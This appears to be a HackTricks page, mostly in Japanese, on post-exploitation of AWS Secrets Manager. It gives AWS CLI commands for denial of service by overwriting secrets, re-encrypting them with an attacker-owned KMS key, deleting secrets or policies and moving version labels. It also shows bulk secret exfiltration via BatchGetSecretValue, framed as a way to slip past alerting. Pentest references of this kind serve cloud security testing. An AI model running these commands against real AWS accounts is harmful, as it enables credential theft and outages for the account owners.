# AWS - Secrets Manager Post Exploitation {{#include ../../../../banners/hacktricks-training.md}} ## Secrets Manager 詳細は次を参照してください: {{#ref}} ../../aws-services/aws-secrets-manager-enum.md {{#endref}} ### Secrets の読み取り **secrets 自体は機密情報です**、[check the privesc page](../../aws-privilege-escalation/aws-secrets-manager-privesc/README.md) を参照して、読み取り方法を学んでください。 ### DoS Change Secret Value secret の値を変更すると、その値に依存するすべてのシステムを**DoS**する可能性があります。 > [!WARNING] > 以前の値も保存されていることに注意してください。したがって、簡単に以前の値に戻すことができます。 ```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### DoS Change KMS key 攻撃者が secretsmanager:UpdateSecret 権限を持っている場合、攻撃者が所有する KMS key を使用するよう secret を設定できます。そのキーは初期設定で誰でもアクセス・使用できるようになっているため、secret を新しいキーで更新することが可能です。もしそのキーにアクセスできない設定であれば、secret を更新することはできません。 secret のキーを変更した後、攻撃者は自分のキーの設定を変更して自分だけがアクセスできるようにします。こうすることで、以降のバージョンの secret は新しいキーで暗号化され、誰もアクセスできないため、secret を取得する能力が失われます。 重要なのは、このアクセス不能は secret の内容が変更された後に作られる後続のバージョンでのみ発生するということです。現行のバージョンは元の KMS key で暗号化されたままだからです。 ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS Deleting Secret シークレットを削除する最小日数は7日です ```bash aws secretsmanager delete-secret \ --secret-id MyTestSecret \ --recovery-window-in-days 7 ``` ## secretsmanager:RestoreSecret シークレットを復元することが可能です。これにより、削除予定になっているシークレットを復元できます。シークレットの最小削除期間は7日、最大は30日です。secretsmanager:GetSecretValue 権限と組み合わせることで、それらの内容を取得できるようになります。 削除処理中のシークレットを復旧するには、次のコマンドを使用できます: ```bash aws secretsmanager restore-secret \ --secret-id ``` ## secretsmanager:DeleteResourcePolicy このアクションは、secret へのアクセスを制御する resource policy を削除することを許可します。resource policy が特定のユーザー群へのアクセスを許可するように設定されていた場合、これは DoS につながる可能性があります。 resource policy を削除するには: ```bash aws secretsmanager delete-resource-policy \ --secret-id ``` ## secretsmanager:UpdateSecretVersionStage シークレットの状態は、シークレットのバージョンを管理するために使われます。AWSCURRENT はアプリケーションが使用するアクティブなバージョンを示し、AWSPREVIOUS は必要に応じてロールバックできるよう前のバージョンを保持し、AWSPENDING は新しいバージョンを current にする前にローテーション処理で準備・検証するために使われます。 アプリケーションは常に AWSCURRENT が付いたバージョンを読みます。誰かがそのラベルを誤ったバージョンに移動させると、アプリは無効な認証情報を使ってしまい、動作しなくなる可能性があります。 AWSPREVIOUS は自動的には使用されません。ただし、AWSCURRENT が削除されたり誤って再割り当てされた場合、すべてがまだ前のバージョンで動作しているように見えることがあります。 ```bash aws secretsmanager update-secret-version-stage \ --secret-id \ --version-stage AWSCURRENT \ --move-to-version-id \ --remove-from-version-id ``` {{#include ../../../../banners/hacktricks-training.md}} ### Mass Secret Exfiltration via BatchGetSecretValue (up to 20 per call) Secrets Manager の BatchGetSecretValue API を悪用して、1回のリクエストで最大20件のシークレットを取得します。個々のシークレットごとに GetSecretValue を繰り返す場合と比べて、API 呼び出し回数を大幅に削減できます。フィルター(tags/name)を使用する場合は、ListSecrets 権限も必要です。CloudTrail はバッチで取得した各シークレットごとに GetSecretValue イベントを記録します。 必要な権限 - secretsmanager:BatchGetSecretValue - secretsmanager:GetSecretValue for each target secret - secretsmanager:ListSecrets if using --filters - kms:Decrypt on the CMKs used by the secrets (if not using aws/secretsmanager) > [!WARNING] > Note that the permission `secretsmanager:BatchGetSecretValue` is not included enough to retrieve secrets, you also need `secretsmanager:GetSecretValue` for each secret you want to retrieve. Exfiltrate by explicit list ```bash aws secretsmanager batch-get-secret-value \ --secret-id-list \ --query 'SecretValues[].{Name:Name,Version:VersionId,Val:SecretString}' ``` Exfiltrate をフィルタで(tag key/value または name prefix) ```bash # By tag key aws secretsmanager batch-get-secret-value \ --filters Key=tag-key,Values=env \ --max-results 20 \ --query 'SecretValues[].{Name:Name,Val:SecretString}' # By tag value aws secretsmanager batch-get-secret-value \ --filters Key=tag-value,Values=prod \ --max-results 20 # By name prefix aws secretsmanager batch-get-secret-value \ --filters Key=name,Values=MyApp ``` 部分的な失敗の処理 ```bash # Inspect the Errors list for AccessDenied/NotFound and retry/adjust filters aws secretsmanager batch-get-secret-value --secret-id-list ``` 影響 - 少ないAPIコールで多数のシークレットを迅速に“smash-and-grab”でき、GetSecretValueの急増に合わせて調整されたアラートを回避する可能性がある。 - CloudTrailのログには、バッチで取得された各シークレットごとに1つのGetSecretValueイベントが引き続き記録される。